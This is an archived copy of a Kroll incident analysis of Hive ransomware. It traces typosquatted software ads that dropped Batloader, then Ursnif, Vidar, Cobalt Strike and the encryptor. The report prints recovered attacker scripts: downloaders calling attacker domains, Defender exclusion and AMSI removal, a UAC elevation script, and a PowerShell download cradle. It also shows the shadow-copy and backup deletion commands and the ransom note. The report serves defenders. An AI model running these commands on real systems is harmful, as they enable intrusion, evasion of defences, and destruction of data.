{
	"id": "a37752be-72e5-440b-ae69-799369a5d287",
	"created_at": "2026-04-06T00:20:55.703283Z",
	"updated_at": "2026-04-10T03:21:25.673375Z",
	"deleted_at": null,
	"sha1_hash": "61d56c8037ce9e3fdfe4c2cd19a02e871e7e07fb",
	"title": "Hive Ransomware Technical Analysis and Initial Access Discovery",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1916539,
	"plain_text": "Hive Ransomware Technical Analysis and Initial Access Discovery\r\nPublished: 2023-02-02 · Archived: 2026-04-05 16:35:00 UTC\r\nHive has been seized by law enforcement, but we're likely to still see these initial access methods and tactics used\r\nacross other threat actor groups.\r\nKroll has observed an increase in Hive ransomware incidents across a wide range of industry verticals. A new\r\ntrend of initial infection vector (IIV) has been identified by Kroll analysts that may relate to the increase of\r\nactivity and the varying nature of targets. Across a number of incidents, the IIV was attributed to IT administrators\r\nlooking to download common softwares from Google such as TeamViewer, Zoom and AnyDesk, and they were\r\nprovided with advertisements for these tools at the top of their search results. We recently reported on this trend,\r\nwhere threat actors were abusing Google Ads to deploy malware via downloads.\r\nWhen these IT administrators downloaded the desired “tools” from the malicious ad links, Batloader was also\r\nunknowingly delivered. Batloader is an initial access malware utilized to deliver tools such as Zloader, Ursnif and\r\nVidar to further establish the threat actor’s foothold within a network. Cobalt Strike can then be installed to\r\nmaintain command and control. Once the threat actor has acquired credentials and identified sensitive files for\r\nexfiltration, they are able to utilize common exfiltration tools such as WinSCP and Rclone to extract a victim’s\r\ndata. The ransomware binary is then executed with a specific identifiable encryption key and this is used to create\r\nthe ransom note named “HOW_TO_DECRYPT.txt” and appends a specific file extension related to a dropped key\r\nfile within the root of C:\\.\r\nA login is provided for the victim to access the Hive “Sales Department” onion site, and if demands are not met,\r\ndata is then shared on their “Hive Leak” onion site.\r\nTimeline of Incident\r\nInitial Exploit\r\nhttps://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery\r\nPage 1 of 13\n\nIn a recent case, after the IT administrator searched for TeamViewer and clicked the advertisement link, they were\r\ndirected to https://caroseyama[.]xyz/9hjLXZR?https://www.teamviewer[.]com/en/customer-support. This link then\r\nredirected to https://teamviewclouds[.]com/index.php. Our experts analyzed the teamviewclouds domain and\r\nidentified a large number of similar typosquatted domains for a wide range of common software hosted on the\r\nsame IP address and hosted by regprivate[.]ru.    Most of these domains were inactive, which suggests that the\r\nthreat actors are continually creating new advertisements. An installation file is then provided from\r\nhttps://dc444.4sync[.]com/download/fXx-c_iZ/InstallerV36__218_.zip, which is the Batloader .msi file. The file\r\nsharing provider 4sync has been identified across separate Batloader incidents and appears to serve the Batloader\r\n.msi download.\r\nzoomyclouds[.]com, zoomedes[.]com, zohosz[.]com, teamviewerq[.]com, teamviewer-cloudcomputing[.]com, teamviewcl\r\nFigure 1: Example of Typosquatted domains associated with teamviewclouds[.]com\r\nThe installer itself installed novaPDF by Softland rather than TeamViewer and dropped PowerShell scripts\r\n“scrED95.ps1” and “pssEDC6.ps1”. “pssEDC6.ps1” is a conversion script that creates the initial downloader\r\nscript “scrED95.ps1”. This script downloads the initial Batloader script “update.bat” and sets the working\r\ndirectory to the user’s appdata local directory. The scripts are executed by PowerShell as shown in figure 2.\r\npowershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File \"C:\\Users\\user\\AppData\\Local\\Temp\\pssED\r\nFigure 2: PowerShell command to create initial downloader\r\nSet-Location \"$Env:USERPROFILE\\AppData\\Roaming\"\r\nInvoke-RestMethod -Uri https://cloudupdatesss[.]com/g5i0nq/index/e6a5614c379561c94004c531781ee1c5/?servername=ms\r\nStart-Process -WindowStyle hidden -FilePath \"$Env:USERPROFILE\\AppData\\Roaming\\update.bat\r\nFigure 3: scrED95.ps1\r\nMITRE ATT\u0026CK: T1583.001: Acquire Domain Names\r\nMITRE ATT\u0026CK: T1608.004: Stage Capabilities - Drive-by Target\r\nMITRE ATT\u0026CK: T1588: Obtain Capabilities\r\nMITRE ATT\u0026CK: T1189: Drive-by Compromise\r\nToolkit Deployment and Escalation\r\nTo maintain persistence and to gain increased privileges, Hive actors leverage Batloader to download Ursnif and\r\nVidar, but also attempt to gain the highest privileges possible to install the malware. The initial Batloader script\r\ndownloads “requestadmin.bat” and attempts to execute it with evaluated privileges by nircmd.exe.\r\npowershell Invoke-WebRequest https://cloudupdatesss[.]com/g5i0nq/index/f69af5bc8498d0ebeb37b801d450c046/?server\r\npowershell Invoke-WebRequest https://cloudupdatesss[.]com/g5i0nq/index/c003996958c731652178c7113ad768b7/?servern\r\nhttps://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery\r\nPage 2 of 13\n\ncmd /c nircmd elevatecmd exec hide \"requestadmin.bat\"\r\nping 127.0.0.1 -n 20\r\nFigure 4: update.bat\r\nThe “requestadmin.bat” then attempts to download further scripts named “runanddelete.bat” and “scripttodo.ps1”.\r\nThe script itself also attempts to whitelist specific paths from Windows Defender before downloading Nsudo.exe.\r\nNsudo provides capabilities to execute binaries with elevated privileges, which are then used to edit the system\r\nregistry to disable the user access control prompt and to disable task manager and other registry tools. The\r\nWindows power system settings tool Powercfg is then executed to disable sleep, which will allow the threat actor\r\nto maintain persistent access.\r\nset pop=%systemroot%\r\ncd %APPDATA%\r\npowershell Invoke-WebRequest https://cloudupdatesss[.]com/g5i0nq/index/a3874ddb552a5b45cade5a2700d15587/?servern\r\ncd %APPDATA%\r\npowershell Invoke-WebRequest https://cloudupdatesss[.]com/g5i0nq/index/fa777fbbb8f055cb8bfcba6cb41c62e7/?servern\r\nstart /b PowerShell -NoProfile -ExecutionPolicy Bypass -Command \"\u0026 './scripttodo.ps1'\"\r\ndel nircmd.exe\r\ncmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -Exclus\r\ncmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -Exclus\r\n--- \u003csnip\u003e ---\r\npowershell Invoke-WebRequest https://raw.githubusercontent[.]com/swagkarna/Bypass-Tamper-Protection/main/NSudo.e\r\nset pop=%systemroot%\r\nNSudo -U:T -ShowWindowMode:Hide reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"Co\r\nNSudo -U:T -ShowWindowMode:Hide reg add \"HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\UX Configuration\" /v\r\nNSudo -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"Dis\r\nNSudo -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"Dis\r\nNSudo -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\" /v \"Dis\r\nNSudo -U:T -ShowWindowMode:Hide reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\" /v \"N\r\npowercfg.exe /SETACVALUEINDEX SCHEME_CURRENT SUB_VIDEO VIDEOCONLOCK 1800\r\npowercfg -change -standby-timeout-dc 3000\r\npowercfg -change -standby-timeout-ac 3000\r\nstart /b \"\" cmd /c del \"%~f0\"\u0026exit /b\r\nFigure 5: requestadmin.bat\r\nThe script “runanddelete.bat” appears to be a modified open-source script named “get-admin.bat”. This script\r\nattempts to spawn the user access control prompt to gain the increased privileges to then spawn an Administrator\r\nshell, via a created file named “getadmin.vbs”. Once increased privileges are achieved, it then attempts to run\r\nUrsnif (d2ef5.exe). Ursnif can be used to extract system information and seek to steal user credentials.\r\nhttps://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery\r\nPage 3 of 13\n\n@echo off\r\ntitle Installing Packages\r\n:: BatchGotAdmin\r\n::-------------------------------------\r\nREM --\u003e Check for permissions\r\n\u003enul 2\u003e\u00261 \"%SYSTEMROOT%\\system32\\cacls.exe\" \"%SYSTEMROOT%\\system32\\config\\system\"\r\nREM --\u003e If error flag set, we do not have admin.\r\nif '%errorlevel%' NEQ '0' (\r\n echo Requesting administrative privileges...\r\n goto UACPrompt\r\n) else ( goto gotAdmin )\r\n:UACPrompt\r\n echo Set UAC = CreateObject^(\"Shell.Application\"^) \u003e \"%temp%\\getadmin.vbs\"\r\n set params = %*:\"=\"\r\n echo UAC.ShellExecute \"cmd.exe\", \"/c %~s0 %params%\", \"\", \"runas\", 0 \u003e\u003e \"%temp%\\getadmin.vbs\"\r\n \"%temp%\\getadmin.vbs\"\r\n del \"%temp%\\getadmin.vbs\"\r\n exit /B\r\n:gotAdmin\r\necho Installing Necessary Packages.....Please Wait.....\r\ncd %APPDATA%\r\nstart /b d2ef5.exe\r\nFigure 6: runanddelete.bat\r\nThe script “scripttodo.ps1” initially installs GNU Privacy Guard for Windows (“Gpg4Win”), which is a file\r\nencryption software. Vidar binaries are then downloaded and decrypted by Gpg4Win along with a further attempt\r\nto download Nsudo.exe. The Vidar binaries are then executed, likely in an attempt to further gather system\r\ninformation and to gather credentials. The script also creates exclusions in the registry to prevent Windows\r\nDefender alerting on execution.\r\nparam\r\n(\r\n[Parameter(Mandatory)]\r\n[ValidateNotNullOrEmpty()]\r\n[string]$DownloadFolderPath,\r\nhttps://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery\r\nPage 4 of 13\n\n[Parameter()]\r\n[ValidateNotNullOrEmpty()]\r\n[string]$DownloadUrl = 'http://files.gpg4win[.]org/gpg4win-2.2.5.exe'\r\n)\r\n--- \u003csnip\u003e ---\r\nif ($Condition_All )\r\n{\r\n $URL = \"https://cloudupdatesss[.]com/t1mw0r/index/d2ef590c0310838490561a205469713d/?servername=msi\u0026arp=\"+ $I\r\n $URL1 = \"https://cloudupdatesss[.]com/t1mw0r/index/i850c923db452d4556a2c46125e7b6f2/?servername=msi\u0026arp=\"+ $I\r\n $URL2 = \"https://cloudupdatesss[.]com/t1mw0r/index/b5e6ec2584da24e2401f9bc14a08dedf/?servername=msi\u0026arp=\"+ $I\r\nInvoke-WebRequest $URL -outfile p9d2s.exe.gpg\r\nInvoke-WebRequest $URL1 -outfile p9d2.bat\r\nInvoke-WebRequest $URL2 -outfile ata.exe.gpg\r\n}\r\n--- \u003csnip\u003e ---\r\nRemove-Item -Path \"HKLM:\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{2781761E-28E0-4109-99FE-B9D127C57AFE}\" -Recurse\r\n[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\r\n$uri = 'https://raw.githubusercontent.com/adbertram/Random-PowerShell-Work/master/Security/GnuPg.psm1'\r\n$moduleFolderPath = 'C:\\Program Files\\WindowsPowerShell\\Modules\\GnuPg'\r\n$null = New-Item -Path $moduleFolderPath -Type Directory\r\nInvoke-WebRequest -Uri $uri -OutFile (Join-Path -Path $moduleFolderPath -ChildPath 'GnuPg.psm1')\r\n$env:APPDATA\r\nInstall-GnuPG -DownloadFolderPath $env:APPDATA\r\necho \"START\"\r\nAdd-MpPreference -ExclusionExtension “exe”\r\nAdd-MpPreference -ExclusionExtension “dll”\r\nRemove-Encryption -FolderPath $env:APPDATA -Password '105b'\r\nInvoke-WebRequest https://raw.githubusercontent[.]com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe -outfile\r\n.\\p9d2s.exe\r\n.\\ata.exe\r\n.\\p9d2.bat\r\nFigure 7: scripttodo.ps1 snippets\r\nMITRE ATT\u0026CK: T1059: Command and Scripting Interpreter\r\nMITRE ATT\u0026CK: T1064: Scripting\r\nMITRE ATT\u0026CK: T1548.002: Bypass User Account Control\r\nMITRE ATT\u0026CK: T1222: File and Directory Permissions Modification\r\nMITRE ATT\u0026CK: T1583.001: Acquire Domain Names\r\nhttps://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery\r\nPage 5 of 13\n\nMITRE ATT\u0026CK: T1027: Obfuscated Files\r\nMITRE ATT\u0026CK: T1056: Input Capture\r\nThe post-exploitation tool Cobalt Strike is often leveraged to provide command and control, utilizing both HTTP\r\nand SMB beacons to move laterally and report back to the threat actor’s infrastructure.\r\n{\r\n \"BeaconType\": [\r\n \"HTTP\"\r\n ],\r\n \"Port\": 80,\r\n \"SleepTime\": 45000,\r\n \"MaxGetSize\": 1403644,\r\n \"Jitter\": 37,\r\n \"C2Server\": \"softeruplive[.]com,/jquery-3.3.1.min.js\",\r\n \"HttpPostUri\": \"/jquery-3.3.2.min.js\",\r\n \"Malleable_C2_Instructions\": [\r\n \"Remove 1522 bytes from the end\",\r\n \"Remove 84 bytes from the beginning\",\r\n \"Remove 3931 bytes from the beginning\",\r\n \"Base64 URL-safe decode\",\r\n \"XOR mask w/ random key\"\r\n ],\r\n \"SpawnTo\": \"AAAAAAAAAAAAAAAAAAAAAA==\",\r\n \"HttpGet_Verb\": \"GET\",\r\n \"HttpPost_Verb\": \"POST\",\r\n--- \u003cSNIP\u003e ---\r\nFigure 8: Cobalt Strike HTTP beacon\r\nMITRE ATT\u0026CK: T1001: Data Obfuscation\r\nMITRE ATT\u0026CK: T1573.001: Encrypted Channel: Symmetric Cryptography\r\nIf required, the threat actors have also used minidump and ProcDump to dump the LSASS process. This is likely\r\nan attempt to dump NTLM credential hashes for password cracking, or for pass the hash techniques. PowerSploit\r\nhas also been identified with attempts to run “Invoke-Kerberoast” to gain Kerberos ticket hashes for service\r\naccounts. This would likely provide the threat actor with increased privileges or access if successful.\r\nMITRE ATT\u0026CK: T1003.001: Credential Dumping – LSASS Memory\r\nMITRE ATT\u0026CK: T1558.003: Kerberoasting\r\nMITRE ATT\u0026CK: T1550: Use Alternate Authentication Material\r\nCommon remote access software such as Splashtop can be installed via Cobalt Strike to provide a persistent,\r\nseemingly legitimate access to the network. This also allows the threat actor to conduct hands-on operations.\r\nRemote Desktop Protocol (RDP) is used with legitimate accounts to navigate across the network.\r\nhttps://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery\r\nPage 6 of 13\n\nMITRE ATT\u0026CK: T1219: Remote Access Software\r\nMITRE ATT\u0026CK: T1021: Remote Services\r\nInternal Scouting\r\nOnce the threat actor gains a foothold within the network, Kroll has observed the use of tools such as ADFind to\r\nidentify accounts and servers. Other common tools such as nslookup and whoami have also been used to gain\r\ninitial system information.\r\nThe Exchange PowerShell module Get-DomainController has also been identified when leveraging Cobalt Strike\r\nto execute commands. This module provides information on the domain controller for the local domain.\r\npowershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbA\r\n---Decoded Base64 string---\r\nIEX (New-Object Net.Webclient).DownloadString('http://localhost:7572/'); Get-DomainController\r\nFigure 9: Example of Cobalt Strike commands\r\nMITRE ATT\u0026CK: T1482: Domain Trust Discovery\r\nMITRE ATT\u0026CK: T1087: Account Discovery\r\nMITRE ATT\u0026CK: T1016: System Network Configuration Discovery\r\nMission Execution\r\nThe threat actors look to identify sensitive files for exfiltration before encrypting devices by using tools such as\r\nRclone to automate data extraction to cloud storage. Kroll has observed that threat actors have searched for files\r\nusing PowerShell and manual traversal across files.\r\nMITRE ATT\u0026CK: T1005: Data from Local System\r\nMITRE ATT\u0026CK: T1567.002: Exfiltration Over Web Service : Exfiltration to Cloud Storage\r\nMITRE ATT\u0026CK: T1020: Automate Exfiltration\r\nTo push the ransomware binary across the network, the sysinternals tool PsExec has been leveraged as well as\r\ncustom scripts to deploy the encryptor. The ransomware binary itself appears to come in both 64 and 32 bit\r\nversions. To encrypt, the binary requires the login and password \".\\windows_x64_encrypt.exe -u login:password”.\r\nThere are other options available for file encryption including:\r\n-local-only: Encrypt only local files.\r\n-no-discovery: Do not look for network shares.\r\n-explicit-only: Encrypt specific directories.\r\nBy default, the binary prevents recovery by deleting volume shadow copies “vssadmin.exe delete shadows /all\r\n/quiet” and deletes system backups with “wbadmin.exe delete systemstatebackup” and “wbadmin.exe delete\r\ncatalog-quiet” before preventing recovery from boot with “\\bcdedit.exe /set {default} recoveryenabled No” and\r\n“bcdedit.exe\" /set {default} bootstatuspolicy ignoreallfailures”. The binary encrypts files, except for “.lnk” files\r\nhttps://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery\r\nPage 7 of 13\n\nand binaries within “C:\\windows”, before generating two key files in the root of C:\\. The key files also determine\r\nthe extension string added to the encrypted files along with a base64 encoded pointer.\r\nYour network has been breached and all data were encrypted.\r\nPersonal data, financial reports and important documents are ready to disclose.\r\nTo decrypt all the data and to prevent exfiltrated files to be disclosed at\r\nhttp://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd[.]onion/\r\nyou will need to purchase our decryption software.\r\n \r\nPlease contact our sales department at:\r\n \r\n http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd[.]onion/\r\n \r\n Login: \u003credacted\u003e\r\n Password: \u003credacted\u003e\r\n \r\nTo get an access to .onion websites download and install Tor Browser at:\r\n https://www.torproject[.]org/ (Tor Browser is not related to us)\r\n \r\n \r\nFollow the guidelines below to avoid losing your data:\r\n \r\n - Do not modify, rename or delete *.key files. Your data will be\r\n undecryptable.\r\n - Do not modify or rename encrypted files. You will lose them.\r\n - Do not report to the Police, FBI, etc. They don't care about your business.\r\n They simply won't allow you to pay. As a result you will lose everything.\r\n - Do not hire a recovery company. They can't decrypt without the key.\r\n They also don't care about your business. They believe that they are\r\n good negotiators, but it is not. They usually fail. So speak for yourself.\r\n - Do not reject to purchase. Exfiltrated files will be publicly disclosed.\r\nFigure 10: HOW_TO_DECRYPT.txt\r\nMITRE ATT\u0026CK: T1570 : Lateral Tool Transfer\r\nMITRE ATT\u0026CK: T1490 : Inhibit System Recovery\r\nMITRE ATT\u0026CK: T1486 : Data Encrypted for Impact\r\nOnce data has been extracted and encrypted, victims are directed to their customer page to negotiate the ransom\r\nfee. If a fee is not agreed, then victims could be placed onto their shaming site: “HiveLeaks.”\r\nhttps://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery\r\nPage 8 of 13\n\nFigure 11: HiveLeaks Shaming Site\r\nMitre ATT\u0026CK Mapping\r\nTactic  Technique Procedure\r\nTA0042\r\n T1566.002 Acquire Domain Names\r\n T1588.001 Obtain Capabilities - Malware\r\n T1588.002 Obtain Capabilities - Tool\r\n T1608.004 Stage Capabilities - Drive-by Target\r\nTA0001 T1189 Drive-by Compromise\r\nTA0002 T1059 Command and Scripting Interpreter\r\nT1064 Scripting\r\nhttps://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery\r\nPage 9 of 13\n\nT1204 User Execution\r\nT1072 Software Deployment Tools\r\nTA0003\r\nT1078 Valid Accounts\r\nT1543.003 Create or Modify System Process - Windows Service\r\n TA0004\r\nT1548.002 Bypass User Account Control\r\nT1134 Access Token Manipulation\r\n TA0005\r\nT1548.002 Bypass User Account Control\r\nT1222 File and Directory Permissions Modification\r\nT1070 Indicator Removal\r\nT1027 Obfuscated Files\r\nT1550 Use Alternate Authentication Material\r\nT1078 Valid Accounts\r\nTA0006\r\nT1056 Input Capture\r\nT1003.001 Credential Dumping - LSASS Memory\r\nT1558.003 Steal or Forge Kerberos Tickets - Kerberoasting\r\nhttps://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery\r\nPage 10 of 13\n\nTA0007\r\nT1482 Domain Trust Discovery\r\nT1087 Account Discovery\r\nT1016 System Network Configuration Discovery\r\nTA0008\r\nT1021 Remote services\r\nT1570 Lateral Tool Transfer\r\nTA0009 T1005 Data from Local System\r\nTA0011\r\nT1219  Remote Access Software\r\nT1573.001 Encrypted Channel: Symmetric Cryptography\r\nT1001 Data Obfuscation\r\nTA0010\r\nT1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage\r\nT1020 Automate Exfiltration\r\nTA0040\r\nT1490 Inhibit System Recovery\r\nT1486\r\nData Encrypted for Impact\r\nRecommendations\r\nKroll has identified recommendations relating to this alert:\r\nhttps://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery\r\nPage 11 of 13\n\nRecommendation Observation\r\nMonitor PowerShell execution\r\nEnsure PowerShell is logged, and create\r\ndetections for encoded script execution.\r\nThe threat actor utilized Cobalt Strike. Monitoring\r\nPowerShell execution can identify malicious activity\r\nassociated with Cobalt Strike.\r\nEnable credential guard\r\nWindows Credential Guard can provide\r\nprotection against password extraction and\r\nother authentication attacks.\r\nThe threat actor dumped LSASS and conducted Kerberos\r\nattacks. Credential guard can offer some protection against\r\nthese attacks.\r\nAudit user, administrator and service\r\naccounts\r\nEnsure accounts have the correct access and\r\nprivileges. Implement the principle of least\r\nprivilege.\r\nThe threat actor is often able to install tools on user\r\nendpoints. Limiting the privileges of users can prevent a\r\nthreat actor from installing malicious software.\r\nImplement multi-factor authentication\r\nMulti-factor authentication can restrict\r\naccess to sensitive areas and can prevent\r\nlateral movement.\r\nEnabling multi-factor authentication can prevent a threat\r\nactor from moving laterally and accessing sensitive data.\r\nReview backup strategies\r\nEnsure multiple backups are taken and at\r\nleast one backup is isolated from the\r\nnetwork.\r\nAs a ransomware actor’s main aim is to disrupt business,\r\nensuring a viable backup and recovery strategy is in place\r\ncan allow a business to recover quickly.\r\nReview remote access tools\r\nThreat actors leverage legitimate remote access tools to\r\nmaintain persistence. Ensure remote access is monitored and\r\nthat only approved remote access tools exist in the\r\nenvironment.\r\nhttps://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery\r\nPage 12 of 13\n\nIndicators of Compromise\r\nThe following files and hashes have been identified for the incident:\r\nThe following external IP addresses were observed during the incident:\r\nIP Address Comment\r\n46.30.42[.]56 caroseyama[.]xyz\r\n194.67.119[.]190 cloudupdatesss[.]com\r\n45.8.158[.]104 http://45.8.158[.]104/uploaded\r\n37.140.192[.]70 teamviewclouds[.]com\r\nSource: https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery\r\nhttps://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.kroll.com/en/insights/publications/cyber/hive-ransomware-technical-analysis-initial-access-discovery"
	],
	"report_names": [
		"hive-ransomware-technical-analysis-initial-access-discovery"
	],
	"threat_actors": [],
	"ts_created_at": 1775434855,
	"ts_updated_at": 1775791285,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/61d56c8037ce9e3fdfe4c2cd19a02e871e7e07fb.pdf",
		"text": "https://archive.orkl.eu/61d56c8037ce9e3fdfe4c2cd19a02e871e7e07fb.txt",
		"img": "https://archive.orkl.eu/61d56c8037ce9e3fdfe4c2cd19a02e871e7e07fb.jpg"
	}
}